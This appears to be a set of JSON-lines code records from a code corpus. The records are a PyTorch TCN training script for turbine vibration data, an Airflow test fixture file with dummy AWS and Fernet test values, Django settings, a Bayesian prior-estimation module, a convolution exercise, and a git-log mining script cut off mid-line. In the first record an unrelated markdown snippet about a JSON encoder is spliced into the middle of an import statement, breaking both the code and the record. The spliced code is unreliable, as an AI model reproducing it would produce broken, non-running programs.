+{"seq_id":"582090982","text":"import torch.optim as optim\nimport sys\nsys.path.append(\"../../\")\nfrom tcn import TCN\nimport argparse\nfrom 
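webapi.py's LozEncoder pattern, in isolation: json.dumps learns to serialize UUIDs and datetimes by overriding JSONEncoder.default. A standalone sketch (not the project's class):

```python
import json
from datetime import datetime
from uuid import uuid4, UUID

class ApiEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, UUID):
            return str(obj)          # UUIDs as plain strings
        if isinstance(obj, datetime):
            return obj.isoformat()   # ISO-8601 timestamps
        return super().default(obj)

print(json.dumps({'id': uuid4(), 'created': datetime(2020, 1, 1)}, cls=ApiEncoder))
```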
utils.biuld_dataset import *\nfrom utils.util import *\nfrom utils.pytool import EarlyStopping\nimport pandas as pd\nfrom torch.utils.data import DataLoader, TensorDataset\nimport time\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport torch\nfrom torch.utils.data import DataLoader\n# The writer acts as a log that stores everything needed for plotting; the next lines create a 'log' folder in the project directory for those files, which starts out empty\nfrom tensorboardX import SummaryWriter\nwriter = SummaryWriter('log') # create the object that stores the data for TensorBoard\n\n###### Global variables #####\nsteps = 0\n\n# ----------------------------------#\n# config #\n# ----------------------------------#\nparser = argparse.ArgumentParser(description='Sequence Modeling - (Permuted) Sequential SATCN')\nparser.add_argument('--batch_size', type=int, default=64, metavar='N', help='batch size (default: 64)')\nparser.add_argument('--cuda', action='store_false', help='use CUDA (default: True)')\nparser.add_argument('--dropout', type=float, default=0.05, help='dropout applied to layers (default: 0.05)')\nparser.add_argument('--clip', type=float, default=-1, help='gradient clip, -1 means no clip (default: -1)')\nparser.add_argument('--epochs', type=int, default=100, help='upper epoch limit (default: 100)')\nparser.add_argument('--ksize', type=int, default=7, help='kernel size (default: 7)')\nparser.add_argument('--levels', type=int, default=8, help='# of levels (default: 8)')\nparser.add_argument('--log-interval', type=int, default=100, metavar='N', help='report interval (default: 100)')\nparser.add_argument('--lr', type=float, default=1e-4, help='initial learning rate (default: 1e-4)')\nparser.add_argument('--optim', type=str, default='Adam', help='optimizer to use (default: Adam)')\nparser.add_argument('--nhid', type=int, default=10, help='number of hidden units per layer (default: 10)')\nparser.add_argument('--nclass', type=int, default=1, help='size of the output (default: 1)')\nparser.add_argument('--seed', type=int, default=1111, help='random seed (default: 1111)')\nparser.add_argument('--permute', action='store_true', help='use permuted MNIST (default: false)')\nparser.add_argument('--stft', type=bool, default=True, help='Embedding STFT (default: True)')\nparser.add_argument('--train_start_time', type=str, default='2018-07-01', help='Start time of train (default: 2018-07-01)')\nparser.add_argument('--train_end_time', type=str, default='2018-07-01', help='End time of train DS (default: 2018-07-01)')\nparser.add_argument('--test_start_time', type=str, default='2018-07-10', help='Start time of test (default: 2018-07-10)')\nparser.add_argument('--test_end_time', type=str, default='2018-07-10', help='End time of test DS (default: 2018-07-10)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\nprint(args)\n\n# ----------------------------------#\n# load dataset #\n# ----------------------------------#\ndataset = pd.read_parquet(\"./data/HD04/TB020_2018_train_normal.parquet\",\n columns=['x方向振动值', '机舱气象站风速', '轮毂转速', '叶片1角度', '5秒偏航对风平均值', '变频器发电机侧功率'])\ndataset_train = dataset[args.train_start_time : args.train_end_time]\ndataset_test = dataset[args.test_start_time : args.test_end_time]\n\nlable_1hz = np.array(dataset_train[\"x方向振动值\"]).reshape(-1, 1)\n\npd.DataFrame(dataset_train, columns=dataset_train.columns.values).to_parquet('./data/HD04/TB020_train_normal_fornormalizer.parquet')\ndataset_normalizer = preprocessing.StandardScaler().fit(dataset_train)\ndataset_train = 
dataset_normalizer.transform(dataset_train)\ndataset_test = dataset_normalizer.transform(dataset_test)\n\npd.DataFrame(lable_1hz, columns=['label']).to_parquet('./data/HD04/TB020_train_label_fornormalizer.parquet')\ny_train_normalizer = preprocessing.StandardScaler().fit(lable_1hz)\nlable_normal_1hz = y_train_normalizer.transform(lable_1hz)\n\nx_train, y_train, x_val, y_val = data_prepare(dataset_train, args.stft)\nn_fearture = x_train.shape[2]\n\nx_test, y_test = multivariate_data(dataset_test, dataset_test[:, 0],\n 0, None, past_history,\n future_target, STEP,\n single_step=True,\n stft_flag=args.stft)\n\n# ----------------------------------#\n# creating the dataset #\n# ----------------------------------#\ntrainset = TensorDataset(torch.tensor(x_train, dtype=torch.float), torch.tensor(y_train, dtype=torch.float))\nvalset = TensorDataset(torch.tensor(x_val, dtype=torch.float), torch.tensor(y_val, dtype=torch.float))\ntestset = TensorDataset(torch.tensor(x_test, dtype=torch.float), torch.tensor(y_test, dtype=torch.float))\n\n# creating the dataloader\ntrain_loader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True)\nsize_data, seq_length, nb_feature = x_train.shape\n\nval_loader = DataLoader(valset, batch_size=args.batch_size, shuffle=True)\ntest_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=False)\n\n# ----------------------------------#\n# model #\n# ----------------------------------#\npermute = torch.Tensor(np.random.permutation(60).astype(np.float64)).long()\nchannel_sizes = [args.nhid] * args.levels\n\nmodel = TCN(n_fearture, args.nclass, channel_sizes, kernel_size=args.ksize, dropout=args.dropout)\nif args.cuda:\n model.cuda()\n permute = permute.cuda()\n\nlr = args.lr\noptimizer = getattr(optim, args.optim)(model.parameters(), lr=lr)\n\ndef train(ep):\n global steps\n train_loss = 0\n model.train()\n criterion = torch.nn.MSELoss()\n\n start_time = time.time()\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data = data.permute(0, 2, 1)\n if args.permute:\n data = data[:, :, permute]\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n loss.backward()\n if args.clip > 0:\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)\n optimizer.step()\n train_loss += loss.item()\n steps += seq_length\n\n if batch_idx > 0 and batch_idx % args.log_interval == 0:\n print('\\r', '\\tTrain Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tSteps: {}'.format(\n ep, batch_idx * args.batch_size, len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader), loss.item(), steps), sep='', end='', flush=True)\n\n train_loss /= batch_idx\n end_time = time.time()\n print('Train set: Average loss: {:.6f}\\ttime cost: {:.6f}'.format(train_loss,end_time-start_time))\n return train_loss\n\ndef val():\n model.eval()\n test_loss = 0\n criterion = torch.nn.MSELoss()\n batch_idx = 0\n\n with torch.no_grad():\n for data, target in val_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data = data.permute(0, 2, 1)\n # data = data.view(-1, input_channels, seq_length)\n if args.permute:\n data = data[:, :, permute]\n output = model(data)\n loss = criterion(output, target)\n test_loss += loss\n batch_idx += 1\n\n test_loss /= batch_idx\n print('Val set: Average loss: {:.6f}'.format(test_loss))\n return test_loss\n\ndef predict(data_loader, model):\n model.eval()\n pridict_loss = 0\n criterion = torch.nn.MSELoss()\n batch_idx = 0\n pridict_output = []\n target_input = []\n total_loss = []\n\n with torch.no_grad():\n for data, target in data_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data = data.permute(0, 2, 1)\n # data = data.view(-1, input_channels, seq_length)\n if args.permute:\n data = data[:, :, permute]\n output = model(data)\n # pridict_output.append(output)\n\n pridict_output.append(output)\n target_input.append(target)\n\n loss = criterion(output, target)\n total_loss.append(loss.unsqueeze(-1))\n pridict_loss += loss\n batch_idx += 1\n\n pridict_loss /= batch_idx\n print('Predict set: Average loss: {:.6f}'.format(pridict_loss))\n return pridict_loss, total_loss, pridict_output, target_input\n\ndef realtime_predict(data,model):\n model.eval()\n with torch.no_grad():\n if args.cuda:\n data = data.cuda()\n data = data.permute(0, 2, 1)\n # data = data.view(-1, input_channels, seq_length)\n if args.permute:\n data = data[:, :, permute]\n output = model(data)\n return output\n\nif __name__ == \"__main__\":\n # EarlyStopping\n early_stopping = EarlyStopping(patience=10, verbose=True, delta=0.000001, store_path='./models')\n train_loss_list = []\n val_loss_list = []\n\n for epoch in range(1, args.epochs + 1):\n train_loss = train(epoch)\n train_loss_list.append(train_loss)\n val_loss = val()\n val_loss_list.append(val_loss)\n\n if epoch % 10 == 0:\n lr /= 5\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n early_stopping(val_loss, model)\n if early_stopping.early_stop:\n print('Early stopping')\n break\n\n mdhms = time.strftime('%d%H%M', time.localtime(time.time()))\n plt.figure(0, figsize=(10, 6))\n plt.title('Train and Val loss')\n plt.plot(train_loss_list, color='blue', label='train_loss', linewidth=2)\n plt.plot(val_loss_list, color='yellow', label='test_loss', linewidth=2)\n plt.savefig(\"./figure\" + '/loss_' + mdhms + '.png')\n\n pridict_loss, total_loss, pridict_output, target_input = predict(test_loader, model)\n test_out_val = torch.cat(pridict_output, dim=0).cpu().detach().numpy()\n test_Y_val = torch.cat(target_input, dim=0).cpu().detach().numpy()\n\n # Metrics\n print('Test dataset result:')\n # report R^2 on the test set\n metrics_calculate(test_Y_val, test_out_val)\n print(\"R^2 on the test set:\", r2_score(test_Y_val, test_out_val))\n\n out_val_raw = y_train_normalizer.inverse_transform(test_out_val.reshape(-1,1))\n Y_val_raw = y_train_normalizer.inverse_transform(test_Y_val.reshape(-1, 1))\n\n print('Test raw dataset result:')\n # report R^2 on the raw (denormalized) test data\n metrics_calculate(out_val_raw, Y_val_raw)\n print(\"R^2 on the raw test set:\", r2_score(out_val_raw, Y_val_raw))\n\n res = out_val_raw - 
Y_val_raw\n\n plt.figure(1, figsize=(10, 6))\n plt.subplot(311)\n plt.title('Normalized dataset')\n plt.plot(pd.DataFrame(test_Y_val), color='blue', label='label', linewidth=2)\n plt.plot(pd.DataFrame(test_out_val), color='yellow', label='predict', linewidth=2)\n plt.legend()\n\n plt.subplot(312)\n plt.title('Raw dataset')\n plt.plot(pd.DataFrame(Y_val_raw), color='blue', label='label', linewidth=2)\n plt.plot(pd.DataFrame(out_val_raw), color='yellow', label='predict', linewidth=2)\n plt.legend()\n\n plt.subplot(313)\n plt.title('Residual')\n plt.plot(res, color='blue', label='res', linewidth=2)\n plt.plot(pd.DataFrame(abs(res)).rolling(30).mean(), color='yellow', label='res_mean', linewidth=2)\n plt.legend()\n\n plt.savefig(\"./figure\" + '/val_res_' + mdhms + '.png')\n plt.show()\n","sub_path":"train_main.py","file_name":"train_main.py","file_ext":"py","file_size_in_byte":11737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"566870242","text":"\n\nfrom xai.brain.wordbase.nouns._pluperfect import _PLUPERFECT\n\n#class header\nclass _PLUPERFECTS(_PLUPERFECT, ):\n\tdef __init__(self,): \n\t\t_PLUPERFECT.__init__(self)\n\t\tself.name = \"PLUPERFECTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"pluperfect\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_pluperfects.py","file_name":"_pluperfects.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"510076148","text":"\"\"\"This file contains global test fixtures.\n\nThe location of this file also allows pytest to determine what packages\nshould be added to path for use within test files.\n\"\"\"\nimport logging\nimport os\nfrom pathlib import Path\n\nimport pytest\nimport requests\nfrom _pytest.monkeypatch import MonkeyPatch\n\nfrom dag.utils.aws.s3 import get_client\n\nTHIS_FILE = Path(__file__).resolve()\nROOT_DIR = THIS_FILE.parent\n\nENV = os.environ\n# do not set AIRFLOW_HOME in order to avoid littering repo with\n# files that airflow creates automatically\nENV['AIRFLOW__CORE__DAGS_FOLDER'] = str(ROOT_DIR.joinpath('dags'))\n\nTEST_FERNET_KEY = 'TRSq95QF5Pj9ldN002l0GgLX3ze-d92ZSZAmz3pd4wY='\nENV['FERNET_KEY'] = TEST_FERNET_KEY\nENV['PII_FERNET_KEY'] = TEST_FERNET_KEY\nENV['PII_SALT'] = 'pepper'\n\n# prevent using real account just in case\nENV['AWS_ACCESS_KEY_ID'] = 'testing'\nENV['AWS_SECRET_ACCESS_KEY'] = 'testing'\nENV['AWS_SECURITY_TOKEN'] = 'testing'\nENV['AWS_SESSION_TOKEN'] = 'testing'\n\n\n@pytest.fixture(scope='session')\ndef monkeysession():\n \"\"\"Patch to use monkeypatch with session-scoped fixtures.\n\n Use `monkeypatch` instead for function scoped fixtures.\n \"\"\"\n m = MonkeyPatch()\n yield m\n m.undo()\n\n\n@pytest.fixture(scope='module')\ndef monkeymodule():\n \"\"\"Patch to use monkeypatch with module-scoped fixtures.\n\n Use `monkeypatch` instead for function scoped fixtures.\n \"\"\"\n m = MonkeyPatch()\n yield m\n m.undo()\n\n\n@pytest.fixture(scope='session')\ndef this_repo():\n \"\"\"Get the root directory path for this repo.\"\"\"\n return ROOT_DIR\n\n\n@pytest.fixture(scope='session')\ndef dagbag(monkeysession):\n \"\"\"Return a dagbag object from airflow.\"\"\"\n # perform airflow imports here so envvar changed first\n from airflow import settings\n from airflow.models import DagBag\n\n # prevent loading old dag repo policy in airflow_local_settings\n monkeysession.setattr(settings, 'policy', lambda task_instance: None)\n return 
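train_main.py imports EarlyStopping from utils.pytool, which is not included in the record; a common minimal implementation matching the call sites (`early_stopping(val_loss, model)`, `.early_stop`) might look like this — an assumption, not the project's actual class:

```python
class EarlyStopping:
    """Stop training when the validation loss stops improving."""
    def __init__(self, patience=10, verbose=False, delta=0.0, store_path='.'):
        self.patience, self.delta = patience, delta
        self.best = None
        self.counter = 0
        self.early_stop = False

    def __call__(self, val_loss, model=None):
        if self.best is None or val_loss < self.best - self.delta:
            self.best, self.counter = val_loss, 0   # improvement: reset counter
        else:
            self.counter += 1                       # no improvement this epoch
            if self.counter >= self.patience:
                self.early_stop = True
```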
DagBag(include_examples=False)\n\n\n@pytest.fixture\ndef disable_airflow_logger():\n \"\"\"Prevent overly verbose logs from showing when a test fails.\n\n This is best used when several errors are caught, but are still\n logged like in test_validation.py\n \"\"\"\n logger = logging.getLogger('airflow.task')\n logger.disabled = True\n yield\n logger.disabled = False\n\n\n@pytest.fixture\ndef populate_s3():\n \"\"\"Populate s3 files in the mocked aws.\n\n We are using moto directly here instead of going through localstack\n since going over api is too slow and using the localstack infra\n directly requires dealing with npm.\n \"\"\"\n\n def populate(*paths):\n \"\"\"Populate s3 files for passed paths.\n\n If no paths are passed then populates all files.\n \"\"\"\n client = get_client()\n created_buckets = set()\n\n included_paths = [Path(i) for i in paths]\n path = ROOT_DIR.joinpath('tests', 'fixtures', 's3')\n for f in path.rglob('*'):\n relative_path = f.relative_to(path)\n if included_paths and not any(\n p in relative_path.parents or p == relative_path for p in included_paths\n ):\n continue\n bucket, *key = relative_path.parts\n if bucket not in created_buckets:\n client.create_bucket(Bucket=bucket)\n created_buckets.add(bucket)\n if f.is_file():\n client.upload_file(\n Bucket=bucket,\n Filename=str(f.resolve()),\n Key='/'.join(key),\n ExtraArgs={'ServerSideEncryption': 'AES256'},\n )\n\n if os.getenv('MOTO_SERVER_ENABLED'):\n # using moto server, the tests using aws fixtures run slower, but\n # the test suite overall loads faster\n endpoint_url = os.getenv('AWS_ENDPOINT_URL')\n requests.post(f\"{endpoint_url}/moto-api/reset\")\n yield populate\n else:\n # import moto here since import has significant overhead which we dont\n # need when automatically rerunning tests in test.sh\n from moto import mock_s3\n\n mock = mock_s3()\n mock.start()\n yield populate\n mock.stop()\n\n\n@pytest.fixture\ndef mock_anonymizer(monkeypatch):\n response = None\n\n def set_response(value):\n nonlocal response\n response = value\n\n def patch(*args, **kwargs):\n class Response:\n status_code = '200'\n\n def json(self):\n return response\n\n return Response()\n\n from airflow.hooks.http_hook import HttpHook\n\n monkeypatch.setattr(HttpHook, 'run', patch)\n return set_response\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"214462498","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDjango settings for blog project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\nimport environ\n\nBASE_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)\nAPPS_DIR = BASE_DIR.path('blog')\n\nenv = environ.Env()\nenviron.Env.read_env('.env')\n\n# APP CONFIGURATION\n# ******************************************************************************\n\n# DEBUG\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\n# ------------------------------------------------------------------------------\nDEBUG = env.bool('DJANGO_DEBUG', False)\n\nINSTALLED_APPS = (\n\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django.contrib.sitemaps',\n\n # Admin:\n 
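The in-process branch of the populate_s3 fixture relies on moto's S3 mock, imported in the record as `from moto import mock_s3`; reduced to a standalone test (moto <5 API, where mock_s3 exists):

```python
import boto3
from moto import mock_s3

@mock_s3
def test_s3_roundtrip():
    # All boto3 calls inside the decorator hit an in-memory fake, not AWS.
    client = boto3.client('s3', region_name='us-east-1')
    client.create_bucket(Bucket='my-bucket')
    client.put_object(Bucket='my-bucket', Key='k', Body=b'hello')
    assert client.get_object(Bucket='my-bucket', Key='k')['Body'].read() == b'hello'
```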
'django.contrib.admin',\n\n # Fake admin\n 'admin_honeypot',\n\n # Specific apps\n 'blog.core',\n 'blog.blog',\n\n # Healthchecks\n 'health_check',\n 'health_check.db',\n 'health_check.cache',\n 'health_check.storage',\n\n)\n\n# DATABASE CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#databases\n# ------------------------------------------------------------------------------\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': env('POSTGRES_DB', default=''),\n 'USER': env('POSTGRES_USER', default=''),\n 'PASSWORD': env('POSTGRES_PASSWORD', default=''),\n 'HOST': env('POSTGRES_HOST', default='localhost'),\n 'PORT': env('POSTGRES_PORT', default='5432'),\n 'CONN_MAX_AGE': env.int('DATABASE_CONN_MAX_AGE', default=300),\n }\n}\n\n# ADMIN CONFIGURATION\n# ------------------------------------------------------------------------------\nADMIN_URL = env('DJANGO_ADMIN_URL', default='realadmin/')\n\n# URL CONFIGURATION\n# ------------------------------------------------------------------------------\nROOT_URLCONF = 'config.urls'\n\n# WSGI CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\n# ------------------------------------------------------------------------------\nWSGI_APPLICATION = 'config.wsgi.application'\n\n# EMAIL CONFIGURATION\n# ------------------------------------------------------------------------------\nEMAIL_BACKEND = env(\n 'DJANGO_EMAIL_BACKEND',\n default='django.core.mail.backends.smtp.EmailBackend'\n)\nTO_DEFAULT_EMAIL = env('TO_DEFAULT_EMAIL', default='default@default.com')\n\n# GENERAL CONFIGURATION\n# ------------------------------------------------------------------------------\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\nTIME_ZONE = 'Europe/Madrid'\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'en-en'\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n\nDATE_INPUT_FORMATS = ('%d-%m-%Y',)\nDATE_FORMAT = '%d-%m-%Y'\n\n# MIDDLEWARE CONFIGURATION\n# https://docs.djangoproject.com/en/dev/topics/http/middleware/\n# ------------------------------------------------------------------------------\nMIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\n# TEMPLATE CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#templates\n# ------------------------------------------------------------------------------\nTEMPLATES = [\n {\n # https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n 'DIRS': [\n str(APPS_DIR.path('templates')),\n ],\n 'OPTIONS': {\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n 'debug': DEBUG,\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders\n # 
https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ],\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'blog.core.context_processors.common',\n ],\n },\n },\n]\n\n# STATIC FILES CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#static-root\n# ------------------------------------------------------------------------------\nSTATIC_ROOT = str(BASE_DIR('staticfiles'))\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#static-url\nSTATIC_URL = '/static/'\n\n# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = (\n str(APPS_DIR.path('static')),\n)\n\n# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# THIRD PARTY APPLICATIONS\n# ******************************************************************************\n\n# Google reCAPTCHA\n# ------------------------------------------------------------------------------\nRECAPTCHA_SITE_KEY = env('RECAPTCHA_SITE_KEY', default='')\nRECAPTCHA_SECRET_KEY = env('RECAPTCHA_SECRET_KEY', default='')\nRECAPTCHA_URL = 'https://www.google.com/recaptcha/api/siteverify'\n\n# Google Analytics\n# ------------------------------------------------------------------------------\nGA_MEASUREMENT_ID = env('GA_MEASUREMENT_ID', default='')\n","sub_path":"config/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"542487438","text":"import itertools as it\nimport numpy as np\n\nfrom cascade.core.log import getLoggers\n\nCODELOG, MATHLOG = getLoggers(__name__)\n\n\ndef grids_to_set_priors(model, var):\n \"\"\"Iterate over common parts of a DismodGroups object.\"\"\"\n for group_name, group in model.items():\n if group_name not in var or group_name == \"random_effect\":\n continue\n\n for key, prior_grid in group.items():\n if key not in var[group_name]:\n continue\n\n yield group_name, key, prior_grid\n\n\ndef set_priors_from_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *same model*.\n Use this when you have fit fixed and then want to fit again for both.\n\n Args:\n model (Model): A complete model for this location. 
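The settings module above leans on django-environ for typed, defaulted reads from the process environment or a .env file; the core pattern in isolation (hypothetical variable names, mirroring the calls the settings file already makes):

```python
import environ

env = environ.Env()
environ.Env.read_env('.env')                     # merge a .env file if present

DEBUG = env.bool('DJANGO_DEBUG', False)          # typed read with a default
DB_PORT = env('POSTGRES_PORT', default='5432')   # plain string read
```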
It will be modified.\n draws (List[DismodGroups]): A list of fits to this location.\n \"\"\"\n if draws is None:\n return\n\n if len(draws) == 0:\n return\n\n for group_name, key, prior_grid in grids_to_set_priors(model, draws[0]):\n ages = prior_grid.ages\n times = prior_grid.times\n grid_draws = DrawFunction(draws, group_name, key)\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(grid_draws, ages, times)\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\ndef set_priors_from_parent_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *parent model*.\n\n Args:\n model (Model): A complete model for this location. It will be modified.\n draws (List[DismodGroups]): A list of fits to the parent of this location.\n \"\"\"\n if draws is None:\n return\n\n assert len(draws) > 0\n\n for group_name, key, prior_grid in grids_to_set_priors(model, draws[0]):\n ages = prior_grid.ages\n times = prior_grid.times\n # This model's location_id is one of the children for the draws.\n if group_name == \"rate\" and (key, model.location_id) in draws[0][\"random_effect\"]:\n grid_draws = RandomEffectDrawFunction(draws, group_name, key, model.location_id)\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(grid_draws, ages, times)\n CODELOG.debug(f\"Child prior found for {group_name} {key}\")\n elif group_name != \"rate\":\n grid_draws = DrawFunction(draws, group_name, key)\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(grid_draws, ages, times)\n CODELOG.debug(f\"Prior found for {group_name} {key}\")\n else:\n CODELOG.debug(f\"No prior found for {group_name} {key}\")\n continue\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\nclass DrawFunction:\n \"\"\"This says the child draw is the same as the source value.\"\"\"\n def __init__(self, draws, group, key):\n self._draws = draws\n self._group = group\n self._key = key\n\n def __len__(self):\n return len(self._draws)\n\n def __call__(self, idx, age, time):\n return self._draws[idx][self._group][self._key](age, time)\n\n\nclass RandomEffectDrawFunction:\n \"\"\"This applies rate = underlying x exp(random effect).\"\"\"\n def __init__(self, draws, group, key, location):\n self._draws = draws\n self._group = group\n self._key = key\n self._location = location\n\n def __len__(self):\n return len(self._draws)\n\n def __call__(self, idx, age, time):\n underlying = self._draws[idx][self._group][self._key](age, time)\n random_effect = self._draws[idx][\"random_effect\"][(self._key, self._location)](age, time)\n return underlying * np.exp(random_effect)\n\n\ndef gather_draws_for_grid(draws, ages, times):\n \"\"\"Gather data from incoming draws into an array of (draw, age, time)\n\n Args:\n draws (DrawFunction): The draws are a list of Var fits.\n ages (np.ndarray): ages\n times (np.ndarray): times\n\n Returns:\n (np.ndarray, np.ndarray, np.ndarray): 3 numpy arrays\n of shape (age, time, draws) where the second two have one-fewer ages\n and one-fewer times.\n \"\"\"\n draw_data = np.zeros((len(draws), len(ages), len(times)))\n for didx in range(len(draws)):\n for aidx, age in enumerate(ages):\n for tidx, time in enumerate(times):\n draw_data[didx, aidx, tidx] = draws(didx, age, time)\n\n 
draw_data = draw_data.transpose([1, 2, 0])\n draw_dage = np.diff(draw_data, n=1, axis=0)\n draw_dtime = np.diff(draw_data, n=1, axis=1)\n return draw_data, draw_dage, draw_dtime\n\n\ndef estimate_grid_parameters(grid_priors, draws, ages, times):\n assert isinstance(draws, np.ndarray)\n assert len(draws.shape) == 3\n\n for aidx, tidx in it.product(range(len(ages)), range(len(times))):\n age = ages[aidx]\n time = times[tidx]\n grid_priors[age, time] = grid_priors[age, time].mle(draws[aidx, tidx, :])\n","sub_path":"src/cascade/executor/priors_from_draws.py","file_name":"priors_from_draws.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"345809972","text":"import numpy as np\n\nn1 = int(input(\"enter length of x: \"))\nn2 = int(input(\"enter length of h: \"))\n\nx = np.array(input(\"enter values of x (space-separated): \").split(), dtype=float)\nh = np.array(input(\"enter values of h (space-separated): \").split(), dtype=float)\n\ny = []\nfor n in range(n1 + n2 - 1):\n total = 0\n for k in range(n1):\n if (n - k >= 0) and (n - k <= n2 - 1):\n total = total + np.multiply(x[k], h[n - k])\n y = np.append(y, total)\n\nprint(y)\n\n# y[0] = x[0]*h[0]\n# y[1] = x[1]*h[0] + x[0]*h[1]\n","sub_path":"discrete_convolution.py","file_name":"discrete_convolution.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"574413618","text":"from setting import PATH_OF_GITCLONE, PATH_OF_GITLOGTXT, PATH_OF_ERROR_GITLOG, PATH_OF_GITLOGCSV, PATH_OF_GITSHOWLIST\nfrom tqdm import tqdm\nimport subprocess\nimport os\nimport re\nimport pandas as pd\n\n\n\"\"\"\n1. Run git log -p -w\n2. Extract the commitIDs (revisions) whose changes include a Dockerfile\n3. Write them out to a CSV file\n\"\"\"\n\ndef isTargetRepository(repository):\n outputs = os.listdir(PATH_OF_GITLOGTXT)\n\n if repository == \".DS_Store\":\n pass\n elif repository == \"docker_docker\":\n print(\"This is the same as moby\")\n pass\n elif f'{repository}.txt' in outputs:\n print(\"Already Exists!\")\n else:\n return True\n\n return False\n\n\ndef GitlogFileStatus(repository):\n \"\"\"\n file status\n - M : Modified\n - D : Deleted\n - A : Added\n \"\"\"\n\n # -m: option that makes merge commits be treated like regular commits.\n # --pretty=fuller: shows both the commit date and the push (rebase, etc.) date explicitly (probably)\n # https://vividcode.hatenablog.com/entry/git/author-date-and-committer-date\n command = f'git log --name-status -m --pretty=fuller'\n cwd = 